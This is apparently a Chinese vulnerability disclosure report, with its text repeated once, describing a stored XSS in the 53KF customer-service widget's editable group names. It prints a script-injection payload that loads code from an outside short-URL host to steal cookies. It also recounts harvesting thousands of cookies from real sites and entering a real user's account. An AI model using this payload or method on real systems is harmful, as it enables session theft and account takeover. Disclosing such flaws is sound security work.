### 简要描述:
很牛逼很牛逼真的很牛逼,不信,你看
### 详细说明:
53客服
某插件在网页右下角有个企业收藏夹
[<img src="https://images.seebug.org/upload/201501/121346230bd86d6ca271a18eb59908512c15d99d.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/121346230bd86d6ca271a18eb59908512c15d99d.png)
点开里面有个分组。
而这个分组到底是干什么的,怎么分配的。我现在也没弄清楚
但是它的分组名称是可修改的。
修改名称,插入代码
`test"><script src=http://is.gd/wnezNK></script>`
[<img src="https://images.seebug.org/upload/201501/12140437807e140769049810ee11c8b9b407c953.png" alt="插入.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/12140437807e140769049810ee11c8b9b407c953.png)
但是,审查元素去看代码。发现没有,失败了?
[<img src="https://images.seebug.org/upload/201501/12140701883183593fdafdf9e1c8969f17c8abfe.png" alt="没有.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/12140701883183593fdafdf9e1c8969f17c8abfe.png)
可是实际上我们已经收到cookie了。
[<img src="https://images.seebug.org/upload/201501/12140726dc212d5c731d7445a5d0f2aa7a7c2455.png" alt="总数.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/12140726dc212d5c731d7445a5d0f2aa7a7c2455.png)
挂了一晚上加一个上午,收获颇丰啊O(∩_∩)O哈!
而且进去以后发现中枪的可不是一个域名。
7k7k,华夏名网,59互联,兄弟连+一大堆小站,6千加的cookie,怎么也有几百个网站吧。
[<img src="https://images.seebug.org/upload/201501/121417506087505eb9a7deb66690cbe527867336.png" alt="7k7kand华夏名网.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/121417506087505eb9a7deb66690cbe527867336.png)
根据实现分析一下
当用户访问网站时,53kf会分配一个分组。
53kf 的分组是按照我不知道的条件出现在网页下,而且这个分组是可以跨网站,跨用户。
分组重命名的地方存在xss,
插入代码后,当用户访问网页时,53客服分配的分组如果是被我们插如代码的分组的话,用户就中枪了。
利用的时候,我们可以多改几个分组名,提高分组被系统选中的概率。
影响挺大的,理论上只要是你们的客户就可能中枪。
然后外部js代码都能执行了,你说我们能干什么?
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201501/12144117a471da2c484aea8cf1b3349a2c0d6159.png" alt="59互联.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/12144117a471da2c484aea8cf1b3349a2c0d6159.png)
测试中成功进入华夏名网某用户账户。
[<img src="https://images.seebug.org/upload/201501/121504186e9bd7f016eff4fd0a2ef93eb7bbcc65.png" alt="华夏登录.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/121504186e9bd7f016eff4fd0a2ef93eb7bbcc65.png)
[<img src="https://images.seebug.org/upload/201501/121503543b99d0f7bd678583ef6fa30c0893c091.png" alt="华夏主机.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/121503543b99d0f7bd678583ef6fa30c0893c091.png)
简要描述:
很牛逼很牛逼真的很牛逼,不信,你看
详细说明:
53客服
某插件在网页右下角有个企业收藏夹
点开里面有个分组。
而这个分组到底是干什么的,怎么分配的。我现在也没弄清楚
但是它的分组名称是可修改的。
修改名称,插入代码
test"><script src=http://is.gd/wnezNK></script>
但是,审查元素去看代码。发现没有,失败了?
可是实际上我们已经收到cookie了。
挂了一晚上加一个上午,收获颇丰啊O(∩_∩)O哈!
而且进去以后发现中枪的可不是一个域名。
7k7k,华夏名网,59互联,兄弟连+一大堆小站,6千加的cookie,怎么也有几百个网站吧。
根据实现分析一下
当用户访问网站时,53kf会分配一个分组。
53kf 的分组是按照我不知道的条件出现在网页下,而且这个分组是可以跨网站,跨用户。
分组重命名的地方存在xss,
插入代码后,当用户访问网页时,53客服分配的分组如果是被我们插如代码的分组的话,用户就中枪了。
利用的时候,我们可以多改几个分组名,提高分组被系统选中的概率。
影响挺大的,理论上只要是你们的客户就可能中枪。
然后外部js代码都能执行了,你说我们能干什么?
漏洞证明:
测试中成功进入华夏名网某用户账户。
京公网安备 11010502034610号
暂无评论